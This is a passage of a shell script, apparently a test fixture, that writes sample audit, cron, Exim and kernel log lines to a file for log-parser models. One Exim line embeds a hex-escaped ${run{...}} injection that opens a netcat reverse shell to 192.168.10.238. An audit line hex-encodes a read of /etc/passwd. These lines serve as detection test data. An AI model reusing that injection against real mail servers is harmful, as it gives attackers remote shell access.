type=ANOM_CRYPTO_FAIL msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=ANOM_DEL_ACCT msg=audit(1450770603.209:3300446): Text" >> $LOGFILE echo "audispd: type=ANOM_EXEC msg=audit(1222174623.498:608): user pid=12965 uid=1 auid=2 ses=1 msg='op=PAM:unix_chkpwd acct=\"snap\" exe=\"/sbin/unix_chkpwd\" (hostname=?, addr=?, terminal=pts/0 res=failed)'" >> $LOGFILE echo "audispd: type=ANOM_LOGIN_ACCT msg=audit(1450770603.209:3300446): Text" >> $LOGFILE echo "audispd: type=ANOM_LOGIN_FAILURES msg=audit(1450770603.209:3300446): Text" >> $LOGFILE echo "audispd: 
type=ANOM_LOGIN_LOCATION msg=audit(1450770603.209:3300446): Text" >> $LOGFILE echo "audispd: type=ANOM_LOGIN_SESSIONS msg=audit(1450770603.209:3300446): Text" >> $LOGFILE echo "audispd: type=ANOM_LOGIN_TIME msg=audit(1450770603.209:3300446): Text" >> $LOGFILE echo "audispd: type=ANOM_MAX_DAC msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=ANOM_MAX_MAC msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=ANOM_MK_EXEC msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=ANOM_MOD_ACCT msg=audit(1450770603.209:3300446): Text" >> $LOGFILE echo "audispd: type=ANOM_PROMISCUOUS msg=audit(1390181243.575:738): dev=vethDvSeyL prom=256 old_prom=256 auid=4294967295 uid=0 gid=0 ses=4294967295" >> $LOGFILE echo "audispd: type=ANOM_RBAC_FAIL msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=ANOM_RBAC_INTEGRITY_FAIL msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=ANOM_ROOT_TRANS msg=audit(1450770603.209:3300446): Text" >> $LOGFILE echo "type=AVC msg=audit(1226270358.848:238): avc: denied { write } for pid=13349 comm=\"certwatch\" name=\"cache\" dev=dm-0 ino=218171 scontext=system_u:system_r:certwatch_t:s0 tcontext=system_u:object_r:var_t:s0 tclass=dir" >> $LOGFILE echo "audispd: type=AVC_PATH msg=audit(1450770603.209:3300446): Text" >> $LOGFILE echo 'audispd: type=BPRM_FCAPS msg=audit(1583242318.512:13886958): fver=17474 fp=33 fi=4294967295 fe=4294967295 old_pp=message old_pi="apache2" old_pe="/usr/bin/bash" new_pp=(null) new_pi=(null) new_pe=(null)' >> $LOGFILE echo "type=CAPSET msg=audit(1450770603.209:3300446): Text" >> $LOGFILE echo "audispd: type=CHGRP_ID msg=audit(1450770603.209:3300446): Text" >> $LOGFILE echo "audispd: type=CHUSER_ID msg=audit(1450770603.209:3300446): Text" >> $LOGFILE echo "audispd: type=CONFIG_CHANGE msg=audit(1368831799.081:466947): auid=4294967295 ses=4294967295 op=\"remove rule\" path=\"/path/to/my/bin0\" key=(null) list=4 res=1" >> $LOGFILE echo 
"type=CONFIG_CHANGE msg=audit(1479097266.018:224): auid=500 ses=2 op=\"updated_rules\" path=\"/etc/passwd\" key=\"passwd_changes\" list=4 res=1" >> $LOGFILE echo "audispd: type=CRED_ACQ msg=audit(1450894634.199:1276): pid=1956 uid=0 auid=4294967295 ses=4294967295 msg='op=PAM:setcred acct=\"root\" exe=\"/usr/sbin/sshd\" hostname=192.168.2.100 addr=192.168.2.100 terminal=ssh res=success'" >> $LOGFILE echo "audispd: type=CRED_DISP msg=audit(1450894635.111:1281): pid=1956 uid=0 auid=0 ses=213 msg='op=PAM:setcred acct=\"root\" exe=\"/usr/sbin/sshd\" hostname=192.168.2.100 addr=192.168.2.100 terminal=ssh res=success'" >> $LOGFILE echo "audispd: type=CRED_REFR msg=audit(1450894634.211:1279): pid=1958 uid=0 auid=0 ses=213 msg='op=PAM:setcred acct=\"root\" exe=\"/usr/sbin/sshd\" hostname=192.168.2.100 addr=192.168.2.100 terminal=ssh res=success'" >> $LOGFILE echo "audispd: type=CRYPTO_FAILURE_USER msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=CRYPTO_KEY_USER msg=audit(1450770603.209:3300446): Text" >> $LOGFILE echo "audispd: type=CRYPTO_LOGIN msg=audit(1450770603.209:3300446): Text" >> $LOGFILE echo "audispd: type=CRYPTO_LOGOUT msg=audit(1450770603.209:3300446): Text" >> $LOGFILE echo "audispd: type=CRYPTO_PARAM_CHANGE_USER msg=audit(1450770603.209:3300446): Text" >> $LOGFILE echo "audispd: type=CRYPTO_REPLAY_USER msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=CRYPTO_SESSION msg=audit(1150750972.008:3281471): user pid=1111 uid=0 auid=1111 msg='op=start direction=from-server cipher=aes128-ctr ksize=128 rport=40791 laddr=192.168.22.22 lport=22 id=4294967295 exe=\"/usr/sbin/sshd\" (hostname=?, addr=205.22.22.22, terminal=? 
res=success)'" >> $LOGFILE echo "audispd: type=CRYPTO_TEST_USER msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo 'audispd: type=CWD msg=audit(1450767416.248:3295858): cwd="/"' >> $LOGFILE echo "audispd: type=DAC_CHECK msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=DAEMON_ABORT msg=audit(1339336882.189:9206): auditd error halt, auid=4294967295 pid=3095 res=failed" >> $LOGFILE echo "audispd: type=DAEMON_ACCEPT msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=DAEMON_CLOSE msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=DAEMON_CONFIG msg=audit(1264985324.554:4915): auditd error getting hup info - no change, sending auid=? pid=? subj=? res=failed" >> $LOGFILE echo "audispd: type=DAEMON_END msg=audit(1450876093.165:8729): auditd normal halt, sending auid=0 pid=1 subj= res=success" >> $LOGFILE echo "audispd: type=DAEMON_RESUME msg=audit(1300385209.456:8846): auditd resuming logging, sending auid=? pid=? subj=? res=success" >> $LOGFILE echo "audispd: type=DAEMON_ROTATE msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=DAEMON_START msg=audit(1450875964.131:8728): auditd start, ver=2.4 format=raw kernel=3.16.0-4-amd64 auid=4294967295 pid=1437 res=failed" >> $LOGFILE echo "audispd: type=DEL_GROUP msg=audit(1450770603.209:3300446): Text" >> $LOGFILE echo "audispd: type=DEL_USER msg=audit(1450770603.209:3300446): Text" >> $LOGFILE echo "audispd: type=EOE msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo 'audispd: type=EXECVE msg=audit(1582934957.620:917519): argc=10 a0="find" a1="/usr/lib/php" a2="-mindepth" a3="1" a4="-maxdepth" a5="1" a6="-regex" a7=".*[0-9]\.[0-9]" a8="-printf" a9="%f\n"' >> $LOGFILE echo "audispd: type=FD_PAIR msg=audit(1431919799.945:49458): fd0=5 fd1=6" >> $LOGFILE echo "audispd: type=FS_RELABEL msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=GRP_AUTH msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=INTEGRITY_DATA 
msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=INTEGRITY_HASH msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=INTEGRITY_METADATA msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=INTEGRITY_PCR msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=INTEGRITY_RULE msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=INTEGRITY_STATUS msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=IPC msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=IPC_SET_PERM msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=KERNEL msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=KERNEL_OTHER msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=LABEL_LEVEL_CHANGE msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=LABEL_OVERRIDE msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=LOGIN msg=audit(1450767601.778:3296208): login pid=15763 uid=0 old auid=4294967295 new auid=0 old ses=4294967295 new ses=2260" >> $LOGFILE echo "audispd: type=MAC_CIPSOV4_ADD msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=MAC_CIPSOV4_DEL msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=MAC_CONFIG_CHANGE msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=MAC_IPSEC_EVENT msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=MAC_MAP_ADD msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=MAC_MAP_DEL msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=MAC_POLICY_LOAD msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=MAC_STATUS msg=audit(1336836093.835:406): enforcing=1 old_enforcing=0 auid=0 ses=2" >> $LOGFILE echo "audispd: type=MAC_UNLBL_ALLOW msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=MAC_UNLBL_STCADD msg=audit(1234567890.123:1234): 
Text" >> $LOGFILE echo "audispd: type=MAC_UNLBL_STCDEL msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=MMAP msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=MQ_GETSETATTR msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=MQ_NOTIFY msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=MQ_OPEN msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=MQ_SENDRECV msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=NETFILTER_CFG msg=audit(1479622038.866:2): table=filter family=2 entries=0" >> $LOGFILE echo "audispd: type=NETFILTER_PKT msg=audit(1487874761.386:228): mark=0xae8a2732 saddr=127.0.0.1 daddr=127.0.0.1 proto=17" >> $LOGFILE echo "audispd: type=NETFILTER_PKT msg=audit(1487874761.381:227): mark=0x223894b7 saddr=::1 daddr=::1 proto=58" >> $LOGFILE echo "audispd: type=OBJ_PID msg=audit(1279134100.434:193): opid=1968 oauid=-1 ouid=0 oses=-1 obj= ocomm=\"sleep\"" >> $LOGFILE echo 'audispd: type=PATH msg=audit(1582934957.616:917512): item=0 name="/usr/bin/sort" inode=2883 dev=fe:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL' >> $LOGFILE echo 'audispd: type=PROCTITLE msg=audit(1582934957.616:917512): proctitle=736F7274002D726E' >> $LOGFILE echo "audispd: type=RESP_ACCT_LOCK msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=RESP_ACCT_LOCK_TIMED msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=RESP_ACCT_REMOTE msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=RESP_ACCT_UNLOCK_TIMED msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=RESP_ALERT msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=RESP_ANOMALY msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=RESP_EXEC msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=RESP_HALT msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=RESP_KILL_PROC 
msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=RESP_SEBOOL msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=RESP_SINGLE msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=RESP_TERM_ACCESS msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=RESP_TERM_LOCK msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=ROLE_ASSIGN msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=ROLE_MODIFY msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=ROLE_REMOVE msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=SELINUX_ERR msg=audit(1311948547.151:138): op=security_compute_av reason=bounds scontext=system_u:system_r:anon_webapp_t:s0-s0:c0,c100,c200 tcontext=system_u:object_r:security_t:s0 tclass=dir perms=ioctl,read,lock" >> $LOGFILE echo "audispd: type=SERVICE_START msg=audit(1450876900.115:30): pid=1 uid=0 auid=4294967295 ses=4294967295 msg=' comm=\"Serv-U\" exe=\"/lib/systemd/systemd\" hostname=? addr=? terminal=? res=success'" >> $LOGFILE echo "audispd: type=SERVICE_STOP msg=audit(1450876900.115:31): pid=1 uid=0 auid=4294967295 ses=4294967295 msg=' comm=\"Serv-U\" exe=\"/lib/systemd/systemd\" hostname=? addr=? terminal=? 
res=success'" >> $LOGFILE echo "audispd: type=SOCKADDR msg=audit(1582935421.377:947594): saddr=01002F6465762F6C6F6700000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000" >> $LOGFILE echo "audispd: type=SOCKETCALL msg=audit(1134642541.683:201): nargs=3 a0=10 a1=3 a2=9" >> $LOGFILE echo 'audispd: type=SYSCALL msg=audit(1582934957.616:917513): arch=c000003e syscall=2 success=yes exit=3 a0=7f5b904e4988 a1=80000 a2=1 a3=7f5b906ec518 items=1 ppid=25680 pid=25684 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm="sort" exe="/usr/bin/sort" key=(null)' >> $LOGFILE echo "audispd: type=SYSTEM_BOOT msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=SYSTEM_RUNLEVEL msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=SYSTEM_SHUTDOWN msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=TRUSTED_APP msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=TTY msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=USER_ACCT msg=audit(1234877011.795:7732): user pid=26127 uid=0 auid=4294967295 ses=4294967295 msg='op=PAM:accounting acct=\"root\" exe=\"/usr/sbin/sshd\" (hostname=jupiter.example.com, addr=192.168.2.100, terminal=ssh res=success)'" >> $LOGFILE echo "audispd: type=USER_AUTH msg=audit(1451403184.143:1834): pid=3380 uid=0 auid=4294967295 ses=4294967295 msg='op=PAM:authentication acct=\"toor\" exe=\"/usr/sbin/sshd\" hostname=192.168.2.100 addr=192.168.2.100 terminal=ssh res=failed'" >> $LOGFILE echo "audispd: type=USER_AUTH msg=audit(1451403193.995:1835): pid=3380 uid=0 auid=4294967295 ses=4294967295 msg='op=PAM:authentication acct=\"toor\" exe=\"/usr/sbin/sshd\" hostname=192.168.2.100 addr=192.168.2.100 terminal=ssh res=success'" >> $LOGFILE echo "audispd: type=USER_AVC 
msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=USER_CHAUTHTOK msg=audit(1450770603.209:3300446): Text" >> $LOGFILE echo "audispd: type=USER_CMD msg=audit(1450785575.705:3316357): user pid=21619 uid=0 auid=526 msg='cwd=\"/home/hi\" cmd=\"/bin/bash\" (terminal=pts/0 res=success)'" >> $LOGFILE echo "audispd: type=USER_END msg=audit(1450767601.813:3296218): user pid=15764 uid=0 auid=0 msg='PAM: session close acct=\"root\" : exe=\"/usr/sbin/crond\" (hostname=?, addr=?, terminal=cron res=success)'" >> $LOGFILE echo "audispd: type=USER_ERR msg=audit(1450770602.157:3300444): user pid=16643 uid=0 auid=4294967295 msg='PAM: bad_ident acct="?" : exe=\"/usr/sbin/sshd\" (hostname=111.111.211.38, addr=111.111.211.38, terminal=ssh res=failed)'" >> $LOGFILE echo "audispd: type=USER_LABELED_EXPORT msg=audit(1450770603.209:3300446): Text" >> $LOGFILE echo "audispd: type=USER_LOGIN msg=audit(1450770603.209:3300446): user pid=16649 uid=0 auid=4294967295 msg='acct=\"root\": exe=\"/usr/sbin/sshd\" (hostname=?, addr=11.111.53.58, terminal=sshd res=failed)'" >> $LOGFILE echo "audispd: type=USER_LOGOUT msg=audit(1450770603.209:3300446): Text" >> $LOGFILE echo "audispd: type=USER_MAC_POLICY_LOAD msg=audit(1450770603.209:3300446): Text" >> $LOGFILE echo "audispd: type=USER_MGMT msg=audit(1450770603.209:3300446): Text" >> $LOGFILE echo "audispd: type=USER_ROLE_CHANGE msg=audit(1280266360.845:51): user pid=1978 uid=0 auid=500 subj=system_u:system_r:local_login_t:s0-s0:c0.c1023 msg='pam: default-context=user_u:system_r:unconfined_t:s0 selected-context=user_u:system_r:unconfined_t:s0: exe=\"/bin/login\" (hostname=?, addr=?, terminal=tty1 res=success)'" >> $LOGFILE echo "audispd: type=USER_SELINUX_ERR msg=audit(1311948547.151:138): Text" >> $LOGFILE echo "audispd: type=USER_START msg=audit(1450771201.437:3301540): user pid=16878 uid=0 auid=0 msg='PAM: session open acct=\"root\" : exe=\"/usr/sbin/crond\" (hostname=?, addr=?, terminal=cron res=success)'" >> $LOGFILE echo 
"audispd: type=USER_TTY msg=audit(1450770603.209:3300446): Text" >> $LOGFILE echo "audispd: type=USER_UNLABELED_EXPORT msg=audit(1450770603.209:3300446): Text" >> $LOGFILE echo "audispd: type=USYS_CONFIG msg=audit(1450770603.209:3300446): Text" >> $LOGFILE echo "audispd: type=VIRT_CONTROL msg=audit(1450770603.209:3300446): Text" >> $LOGFILE echo "audispd: type=VIRT_MACHINE_ID msg=audit(1450770603.209:3300446): Text" >> $LOGFILE echo "audispd: type=VIRT_RESOURCE msg=audit(1450770603.209:3300446): Text" >> $LOGFILE echo "audisp-remote: queue is full - dropping event" >> $LOGFILE echo "audispd: queue is full - dropping event" >> $LOGFILE echo "audispd: type=UNKNOWN[1327] msg=audit(1522927552.749:917): proctitle=636174002F6574632F706173737764" >> $LOGFILE ;; CronParsingModel) echo "CRON[25537]: (root) CMD ping 8.8.8.8" > $LOGFILE echo "CRON[25537]: pam_unix(cron:session): session opened for user root by (uid=0)" >> $LOGFILE echo "cron[25537]: (*system*mailman) RELOAD (/var/spool/cron/mailman)" >> $LOGFILE echo "CRON[12461]: (root) CMD (command -v debian-sa1 > /dev/null && debian-sa1 1 1)" >> $LOGFILE echo "CRON[12460]: pam_unix(cron:session): session opened for user root by (uid=0)" >> $LOGFILE echo "CRON[13229]: (root) CMD ([ -x /etc/init.d/anacron ] && if [ ! 
-d /run/systemd/system ]; then /usr/sbin/invoke-rc.d anacron start >/dev/null; fi)" >> $LOGFILE echo "CRON[14368]: (root) CMD ( cd / && run-parts --report /etc/cron.hourly)" >> $LOGFILE ;; EximGenericParsingModel) echo "2020-02-29 00:04:25 Start queue run: pid=31912" > $LOGFILE echo "2020-02-29 00:34:25 End queue run: pid=32425" >> $LOGFILE echo "2020-03-04 19:17:34 no host name found for IP address 192.168.10.238" >> $LOGFILE echo "2020-03-04 19:21:48 VRFY failed for boyce@cup.com H=(x) [192.168.10.238]" >> $LOGFILE echo "2020-03-04 19:25:08 1j9Zdk-00029d-Bi <= trula@mail.cup.com U=www-data P=local S=8714 id=20200304192508.Horde.g3OQpszuommgdrQpHrx6wIc@mail.cup.com" >> $LOGFILE echo "2020-03-04 19:25:08 1j9Zdk-00029d-Bi => irwin R=local_user T=mail_spool" >> $LOGFILE echo '2020-03-04 19:36:19 1j9ZoZ-0002Jk-9W ** ${run{\x2fbin\x2fsh\t-c\t\x22nc\t-e\t\x2fbin\x2fsh\t192.168.10.238\t9963\x22}}@localhost: Too many "Received" headers - suspected mail loop' >> $LOGFILE echo "2020-03-04 19:36:57 1j9ZpB-0002KN-QF Completed" >> $LOGFILE echo "2020-03-04 20:04:25 1j9ZoZ-0002Jk-9W Message is frozen" >> $LOGFILE echo "2020-03-04 19:38:19 1j9ZoZ-0002Jk-9W Frozen (delivery error message)" >> $LOGFILE # following examples are covering exim failure message types. The examples are taken from # https://forums.cpanel.net/resources/reading-and-understanding-the-exim-main_log.383/ echo "2014-09-29 21:27:08 1XYdJu-002e6P-9F SMTP error from remote mail server after MAIL FROM: SIZE=6601: host mta5.am0.yahoodns.net [66.196.118.240]: 421 4.7.0 [GL01] Message from (184.171.253.133) temporarily deferred - 4.16.50. 
Please refer to http://postmaster.yahoo.com/errors/postmaster-21.html" >> $LOGFILE echo "2020-04-28 22:08:03 1m1x23-2011cZ-MN H=mta7.am0.yahoodns.net [67.195.228.106]: SMTP error from remote mail server after pipelined MAIL FROM: SIZE=1758: 421 4.7.0 [TSS04] Messages from 184.171.253.133 temporarily deferred due to unexpected volume or user complaints - 4.16.55.1; see https://postmaster.verizonmedia.com/error-codes" >> $LOGFILE echo "2014-09-12 08:01:12 1XSLn4-003Fa1-OX SMTP error from remote mail server after end of data: host gmail-smtp-in.l.google.com [173.194.66.27]: 421-4.7.0 [77.69.28.195 15] Our system has detected an unusual rate of\n421-4.7.0 unsolicited mail originating from your IP address. To protect our\n421-4.7.0 users from spam, mail sent from your IP address has been temporarily\n421-4.7.0 rate limited. Please visit\n421-4.7.0 http://www.google.com/mail/help/bulk_mail.html to review our Bulk\n421 4.7.0 Email Senders Guidelines. q4si1448293wij.85 - gsmtp" >> $LOGFILE echo "2014-09-18 13:44:19 1XUb4M-000v5R-6R SMTP error from remote mail server after MAIL FROM: SIZE=1811: host mta7.am0.yahoodns.net [66.66.66.66]: 421 4.7.1 [TS03] All messages from 5.196.113.212 will be permanently deferred; Retrying will NOT succeed. 
See http://postmaster.yahoo.com/421-ts03.html" >> $LOGFILE echo "TO:: host mx.someaddress.com [20.20.20.20]: 450 4.7.1 Client host rejected: cannot find your hostname, [20.20.20.20] 2014-09-21 16:06:05 1XUKFa-0003bb-EM ** someone@someaddress>: retry timeout exceeded" >> $LOGFILE echo "2014-10-10 10:25:01 1XcKLM-003IGU-Fr SMTP error from remote mail server after RCPT TO:: host pro-mail-mx-002.bol.com [20.20.20.20]: 450 4.7.1 Service unavailable" >> $LOGFILE echo "2014-09-24 12:59:49 1XWqqy-00028x-FK == test@badluckbryan.com R=lookuphost T=remote_smtp defer (-44): SMTP error from remote mail server after RCPT TO:: host gylsystems.com [69.69.69.69]: 451 Temporary local problem - please try later" >> $LOGFILE echo "2014-11-24 11:25:33 H=localhost (mail.fictional.example) [::1]:49956 sender verify defer for : require_files: error for /home/aaron/etc/domain.com: Permission denied" >> $LOGFILE echo "2014-11-24 11:25:33 H=localhost (srv-hs1.netsons.net) [::1]:49956 F= A=dovecot_login:aaron@domain.com temporarily rejected RCPT : Could not complete sender verify" >> $LOGFILE echo "2014-09-13 11:37:53 1XSdCz-00049U-5A ==aaron@domain.com R=lookuphost T=remote_smtp defer (-44): SMTP error from remote mail server after RCPT TO:: host mail.fictional.example [10.5.40.204]: 452 Domain size limit exceeded" >> $LOGFILE echo "2014-08-31 08:43:16 1XO5PX-0006SC-Qa ** aaron@domain.com R=dkim_lookuphost T=dkim_remote_smtp: SMTP error from remote mail server after RCPT TO:: host mail.domain.com [10.5.40.204]: 550-Verification for \n550-The mail server could not deliver mail to garfield@domain.com. The account or domain may not exist, they may be blacklisted, or missing the proper dns entries.\n550 Sender verify failed" >> $LOGFILE echo "SMTP error from remote mail server after RCPT TO:: host mail.fictional.example[10.5.40.204]: 550-Sender has no A, AAAA, or MX DNS records. mail.fictional.example\n550 l mail.fictional.example\nVerify the zone file in /etc/named for the correct information. 
If it appear correct, you can run named-checkzone domain.com domain.com.db to verify if named is able to load the zone." >> $LOGFILE echo "Diagnostic-Code: X-Postfix; host mail1.domain.com [10.5.40.204] said: 550 5.7.1 Message rejected due to content restrictions (in reply to end of DATA command)\nWhen you see an error such as 550 5.7.1" >> $LOGFILE echo "Final-Recipient: rfc822;aaron@domain.com\nAction: failed\nStatus: 5.5.0\nDiagnostic-Code: smtp;550-Please turn on SMTP Authentication in your mail client.\n550-mail.fictional.example [10.5.40.204]:58133 is not permitted to relay 550 through this server without authentication." >> $LOGFILE echo "DHE-RSA-AES256-SHA:256: SMTP error from remote mail server after MAIL FROM: SIZE=1834: host mail.fictional.example [10.5.40.204..212]: 550 \"REJECTED - Bad HELO - Host impersonating [mail.fictional2.example]\"" >> $LOGFILE echo "2014-08-31 08:43:16 1XO5PY-0006SO-GS <= <> R=1XO5PX-0006SC-Qa U=mailnull P=local S=1951 T=\"Mail delivery failed: returning message to sender\" for aaron@domain.com" >> $LOGFILE echo "SMTP error from remote mail server after MAIL FROM:: host mail.fictional.example [10.5.40.204]: 553 sorry, your domain does not exists." >> $LOGFILE echo "2014-11-26 10:26:32 1XtYro-004Ecv-65 ** aaron@domain.com R=dkim_lookuphost T=dkim_remote_smtp: SMTP error from remote mail server after MAIL FROM: SIZE=1604: host mail.fictional.example [10.5.40.204]: 553 unable to verify address\nVerify that SMPT authentication has been enabled." 
>> $LOGFILE echo "[15:03:30 hosts5 root /var/log]cPs# grep 1XeRdP-0006JC-FO exim_mainlog 2014-10-15 12:41:11 1XeRdP-0006JC-FO <= <> R=1XeRdF-0006HI-EY U=mailnull P=local S=5445 T=\"Mail delivery failed: returning message to sender\" for aaron@domain.com 2014-10-15 12:41:11 cwd=/var/spool/exim 3 args: /usr/sbin/exim -Mc 1XeRdP-0006JC-FO 2014-10-15 12:42:12 1XeRdP-0006JC-FO ** aaron@domain.com R=dkim_lookuphost T=dkim_remote_smtp: SMTP error from remote mail server after end of data: host mail.fictional.example [10.5.40.204]: 554 rejected due to spam content" >> $LOGFILE echo "2014-10-01 15:12:26 1XZKdg-0001g3-JS H=mail.fictional.example [10.5.40.204]:4779 Warning: \"SpamAssassin as marka22 detected message as spam (11.0)\"" >> $LOGFILE echo "2014-10-01 15:12:26 1XZKdg-0001g3-JS <=10.5.40.204 H=mail.fictional.example[10.5.40.204]:4779 P=esmtp S=491878 id=dos45yx4zbmri7f@domain.com T="Payment confirmation: 7037487121" for aaron@domain.net [" >> $LOGFILE echo "2014-10-01 15:12:26 1XZKdg-0001g3-JS => aaron R=virtual_user_spam T=virtual_userdelivery_spam" >> $LOGFILE echo "2014-10-01 15:12:26 1XZKdg-0001g3-JS Completed 2014-10-01 15:30:35 1XZKvG-0002HW-ML H=(12-12-12-12.domain.net [10.5.40.204]:65376 Warning: \"SpamAssassin as marka22 detected message as spam (7.2)\"" >> $LOGFILE echo "2014-10-01 15:30:35 1XZKvG-0002HW-ML <= item@something.net H=(12-12-12-12.domain.net [10.5.40.204]:65376 P=esmtp S=519381 id=dos45yx4zbmri7f@domain.com T=\"Payment confirmation: 7037487121\" for mark@domain.com 2014-10-01 15:30:35 1XZKvG-0002HW-ML => mark R=virtual_user_spam T=virtual_userdelivery_spam" >> $LOGFILE echo "2014-10-01 15:30:35 1XZKvG-0002HW-ML Completed" >> $LOGFILE echo "2014-09-10 13:06:55 1XRlM6-003yMv-KG H=mail.fictional.example[10.5.40.204]:46793 Warning: Message has been scanned: no virus or other harmful content was found" >> $LOGFILE echo "2014-09-10 13:06:56 1XRlM6-003yMv-KG H=mail.fictional.example[10.5.40.204]:46793 Warning: \"SpamAssassin as cpaneleximscanner 
detected OUTGOING smtp message as NOT spam (-0.1)\"" >> $LOGFILE echo "2014-09-10 13:06:56 1XRlM6-003yMv-KG <= bob@bob.com H=mail.fictional.example [10.5.40.204]:46793 P=esmtpsa X=TLSv1:AES128-SHA:128 A=dovecot_login:aaron@domain.com S=18635 T=\"14\\\" plates\" for live@somedomain.com" >> $LOGFILE echo "2014-09-10 13:06:56 1XRlM6-003yMv-KG SMTP connection outbound 1410368816 1XRlM6-003yMv-KG domain.com live@somedomain.com" >> $LOGFILE echo "2014-09-10 13:07:22 1XRlM6-003yMv-KG => live@somedomain.com R=dkim_lookuphost T=dkim_remote_smtp H=mail.fictional.example [10.5.40.204] X=TLSv1:DHE-RSA-AES256-SHA:256 C=\"250 OK id=1XRlMC-0006w5-F4\" 2014-09-10 13:07:22 1XRlM6-003yMv-KG Completed" >> $LOGFILE echo "2014-11-06 09:14:13 1XmNp0-0005Qp-MR H=mail-qg0-f68.google.com [10.5.40.204]:42603 Warning: \"SpamAssassin as sfgthib detected message as spam (998.0)\" 2014-11-06 09:14:13 1XmNp0-0005Qp-MR H=mail-qg0-f68.google.com [10.5.40.204]:42603 Warning: Message has been scanned: no virus or other harmful content was found" >> $LOGFILE echo "2014-11-06 09:14:13 1XmNp0-0005Qp-MR <= cpaneltest@gmail.com H=mail.fictional.example [10.5.40.204]:42603 P=esmtps X=TLSv1:RC4-SHA:128 S=3411 id=CAPtYmmQYRDb38yTmnA_ULZVjnKVOdtu6yw-HapGmjBCAk6rYYw@mail.gmail.com T=\"test\" for aaron@domain.com" >> $LOGFILE ;; KernelMsgParsingModel) echo "kernel: martian source 192.168.12.197 from 192.168.12.198, on dev bondib0" > $LOGFILE echo "kernel: martian source 192.168.1.255 from 192.168.1.251, on dev eth3" >> $LOGFILE echo "kernel: ll header: ff:ff:ff:ff:ff:ff:00:18:f8:0e:81:93:08:00" >> $LOGFILE echo "kernel: martian source 192.168.12.197 from 192.168.12.198, on dev bondib0" >> $LOGFILE echo "kernel: ll header: 00000000: ff ff ff ff ff ff 00 50 56 ad 59 09 08 00 .......PV.Y..." >> $LOGFILE echo "kernel: ll header: 00000000: ff ff ff ff ff ff a6 2c 90 bb 31 e9 08 06 .......,..1..." 
